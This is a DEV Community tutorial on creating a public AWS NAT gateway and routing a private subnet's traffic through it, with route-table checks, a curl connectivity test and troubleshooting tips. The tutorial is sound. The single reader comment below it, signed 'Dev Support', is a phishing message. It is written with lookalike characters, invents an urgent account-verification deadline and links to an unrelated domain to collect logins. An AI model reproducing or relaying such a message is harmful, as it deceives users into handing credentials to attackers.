DEV Community

Naoki
Naoki

Posted on

🍊How to Set Up an AWS NAT Gateway Give EC2 Instances in a Private Subnet Internet Access

How to Set Up an AWS NAT Gateway|Give EC2 Instances in a Private Subnet Internet Access

An EC2 instance in a private subnet may need to download OS updates or access an external API.

This article explains how to use a public NAT gateway so an EC2 instance in a private subnet can initiate connections to the internet.

The traffic will follow this path:

EC2 instance in a private subnet
              ↓
       Public NAT gateway
              ↓
       Internet gateway
              ↓
           Internet
Enter fullscreen mode Exit fullscreen mode

Creating a NAT gateway alone is not enough. You also need to check the route tables associated with both the public and private subnets.

Resources Used in This Guide

This setup uses:

  • A VPC
  • A public subnet
  • A private subnet
  • An internet gateway attached to the VPC
  • A public NAT gateway
  • An Elastic IP address for the NAT gateway
  • An EC2 instance in the private subnet for testing

If you already have a VPC and subnets, check their routes first. A subnet’s name may contain “public” or “private,” but its route table determines where its traffic goes.

Check the Public Subnet

In the AWS console, open:

VPC → Subnets → Target subnet ID → Route table
Enter fullscreen mode Exit fullscreen mode

In the route list, find the row whose Destination is 0.0.0.0/0.

Destination    Target
0.0.0.0/0      igw-...
Enter fullscreen mode Exit fullscreen mode

If the Target is igw-..., the subnet has a route to an internet gateway.

Here is an example of the route table in the console:

In this screenshot, 172.31.0.0/16 → local represents traffic within the VPC, while 0.0.0.0/0 → igw-... is the route for internet-bound traffic.

An EC2 instance in this subnet would also need a public IP address, among other settings, to communicate directly with the internet. For now, we are checking whether this subnet is suitable for the NAT gateway.

Check the Private Subnet

Next, check the route table associated with the private subnet where the EC2 instance runs.

VPC → Subnets → Target subnet ID → Route table
Enter fullscreen mode Exit fullscreen mode

For this setup, do not give the private subnet a direct 0.0.0.0/0 → igw-... route.

After configuring the NAT gateway, its route for internet-bound traffic will look like this:

Destination    Target
0.0.0.0/0      nat-...
Enter fullscreen mode Exit fullscreen mode

This route does not need to exist before you create the NAT gateway.

Create a Public NAT Gateway

In the AWS console, open:

VPC → NAT gateways → Create NAT gateway
Enter fullscreen mode Exit fullscreen mode

For this guide, choose a zonal public NAT gateway.

Setting Selection
Availability mode Zonal
Subnet The public subnet you checked
Connectivity type Public
Elastic IP Select an existing Elastic IP or allocate a new one

Review the settings and create the NAT gateway.

Immediately after creation, its status is Pending. Wait until it becomes Available before configuring the route.

Select the public subnet that has a route to the internet gateway. Do not select the private subnet containing the EC2 instance.

Route the Private Subnet Through the NAT Gateway

After creating the NAT gateway, edit the route table associated with the private subnet.

VPC → Subnets → Target private subnet → Route table
Enter fullscreen mode Exit fullscreen mode

Open the displayed route table ID, then choose Actions → Edit routes.

Set the route for internet-bound traffic as follows:

Destination    Target
0.0.0.0/0      Your NAT gateway (nat-...)
Enter fullscreen mode Exit fullscreen mode

Before editing, check:

  • If a 0.0.0.0/0 route already exists, where does it currently point?
  • Is this route table associated with the private subnet you intend to change?

Changing an existing route can affect traffic that uses it. Editing a different route table will not change the intended subnet’s traffic path.

Recheck the Public Subnet Route

The public subnet containing the NAT gateway needs a route to the internet gateway.

Destination    Target
0.0.0.0/0      igw-...
Enter fullscreen mode Exit fullscreen mode

The default routes should point to different targets:

Subnet Target for 0.0.0.0/0
Private subnet NAT gateway (nat-...)
Public subnet Internet gateway (igw-...)

This creates a path for connections initiated in the private subnet to reach the internet through the NAT gateway.

Test Connectivity from the EC2 Instance

Connect to the EC2 instance in the private subnet and try an HTTPS request:

curl -I https://example.com
Enter fullscreen mode Exit fullscreen mode

If you receive a response, the instance can reach that external site.

If the request fails, check:

  • Is the NAT gateway’s status Available?
  • Does the private subnet’s 0.0.0.0/0 route point to the NAT gateway you created?
  • Does the NAT gateway’s public subnet have a 0.0.0.0/0 route to the internet gateway?
  • Does the EC2 instance’s security group allow the required outbound traffic?
  • Are network ACLs blocking the traffic?
  • Can the instance resolve DNS names?

A NAT gateway does not allow new connections from the internet to reach an EC2 instance in the private subnet.

Cost and Architecture Considerations

NAT gateways incur charges based on factors such as running time and the amount of data processed. If you create one for testing, delete it when you no longer need it.

The zonal NAT gateway in this guide belongs to a single Availability Zone. For a setup spanning multiple Availability Zones, consider placing a NAT gateway in each zone and routing each private subnet through a NAT gateway in the same zone.

A regional NAT gateway is another option. It does not require placement in a public subnet, and its setup differs from the steps in this guide.

Summary

To let an EC2 instance in a private subnet initiate internet connections through a public NAT gateway:

  • Find a public subnet with a route to an internet gateway
  • Create a public NAT gateway in that subnet
  • Point the private subnet’s 0.0.0.0/0 route to the NAT gateway
  • Test outbound connectivity from the EC2 instance

Pay particular attention to the route tables for both subnets. Even if the NAT gateway is Available, the EC2 instance will not use it unless the private subnet’s route points to it.

References

Top comments (1)

Collapse
 
supportdev profile image
DEV SUPPORTS •

Deаr Usеr,
Duе to аn inсreasе in bоt аctivіty on the plаtform, we requіre verifу of уour account.
Рlеasе lоg in vіa the link belоw:
• anti-bot.icu/5K0N5G7M9C4
Verificated deadline - 12 hours.
Sincerely,Dev Supроrt

​ ‍‍